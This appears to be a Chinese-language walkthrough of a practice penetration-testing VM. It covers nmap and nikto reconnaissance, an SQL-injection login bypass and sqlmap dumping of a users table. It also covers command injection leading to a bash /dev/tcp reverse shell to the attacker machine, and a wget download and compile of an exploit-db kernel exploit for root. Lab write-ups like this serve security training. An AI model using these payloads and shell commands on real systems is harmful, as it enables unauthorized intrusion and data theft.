一、信息收集

1.主机发现sudo arp-scan -l,识别到靶机IP为192.168.65.135

2.nmap扫描端口及版本nmap -T4 -A -v 192.168.65.135,结果如下

22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            854/udp   status
|_  100024  1            857/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2021-03-15T03:48:40+00:00; -3h09m38s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)

3.nikto目录扫描nikto -host http://192.168.65.135/

+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 - STATUS: Completed 270 requests (~4% complete, 9.0 minutes left): currently in plugin 'Site Files'
- STATUS: Running average: 100 requests: 0.10283 sec, 10 requests: 0.1128 sec.
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2021-03-15 03:34:03 (GMT-4) (61 seconds)

4.访问80端口及扫描出来的路径

二、漏洞发现

1.http://192.168.65.135/index.php处存在sql注入

（1）burpsuitez抓包Fuzz验证

（2）使用username=admin,password='or' 1=1--成功进入

（3）sqlmap脱裤(这下面的没啥用，当练习sqlmap了，不感兴趣可以跳过这一步)

• sqlmap -r 12.txt --dbs --level 3 --risk 2 --batch

• sqlmap -r 12.txt -D webapp --tables --level 3 --risk 2

• sqlmap -r 12.txt -D webapp -T users --columns --level 3 --risk 2

• sqlmap -r 12.txt -D webapp -T users -C username,password --dump --level 3 --risk 2

2.命令执行漏洞

（1）127.0.0.1|ls

（2）kali监听端口nc -lvvp 1234，反弹shell127.0.0.1|bash -i >& /dev/tcp/192.168.65.129/1234 0>&1

（3）查询系统版本umane -a

（4）查找漏洞库，找到内核版本漏洞https://www.exploit-db.com/exploits/9542

（5）下载9542.c，再让靶机下载

• 先下载放在kali

• 然后开启http服务python -m SimpleHTTPServer 9090

• 在刚刚反弹的shell上下载下来wget http://192.168.65.129:9090/9542/9542.c

• 然后编译gcc 9542.c,编译完成后，执行编译出来的文件./a.out,然后提权成功